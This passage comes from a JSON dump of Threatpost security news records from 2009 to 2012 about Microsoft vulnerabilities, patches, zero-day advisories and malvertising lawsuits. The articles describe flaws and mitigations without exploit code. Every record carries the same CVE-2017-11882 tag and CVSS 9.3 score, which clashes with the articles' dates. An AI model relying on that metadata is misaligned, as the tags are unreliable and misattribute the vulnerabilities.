The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. 
And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "[](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks and has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. 
An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides a fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in Office 2010 by tapping into the unused computing horsepower of idling PCs. Office developers found the bugs by running millions of \u201cfuzzing\u201d tests, said Tom Gallagher, senior security test lead with Microsoft\u2019s Trustworthy Computing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. 
These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker disk-encryption technology as \u201crelatively low risk,\u201d noting that attackers must not only have physical access to a targeted PC, but must manipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. 
Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft, said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. 
\u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. 
\u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security[](<https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/>) patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. 
[Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits, [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. 
For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 
09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affect all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action, so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": 
{"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. 
Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. 
Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided Fixit tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins as soon as possible (MS09-032 and MS09-028)\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues were publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-032 and MS09-028:**\n\nMS09-032 is the bulletin for the QuickTime file parsing vulnerability. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. 
If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Adobe QuickTime is not relevant to whether or not your computer is vulnerable to this issue. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. Also, the recent QuickTime patch from Adobe (7.6.2) is not related to this issue.\n\nMS09-032 is rated as Critical for all Operating Systems.\n\nMS09-028 is the bulletin for the recently announced Microsoft DirectShow vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-032, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable section of code. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow have already implemented the complete set of killbits represented by the MS09-028 patch. 
If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents. (in this case, embedded opentype fonts. EOT fonts ensure that everyone viewing the text sees it formatted the same way.) Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. Workarounds are available, but it requires two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use Radius one-time-passwords AND to use Kerberos for authentication AND to fallback to basic http authentication when asked, the attacker may be able to access servers protected by the firewall if they know the username of those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. 
\n** \nMS09-033** relates to Guest Operating Systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server. IOW, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. 
Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. 
Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. 
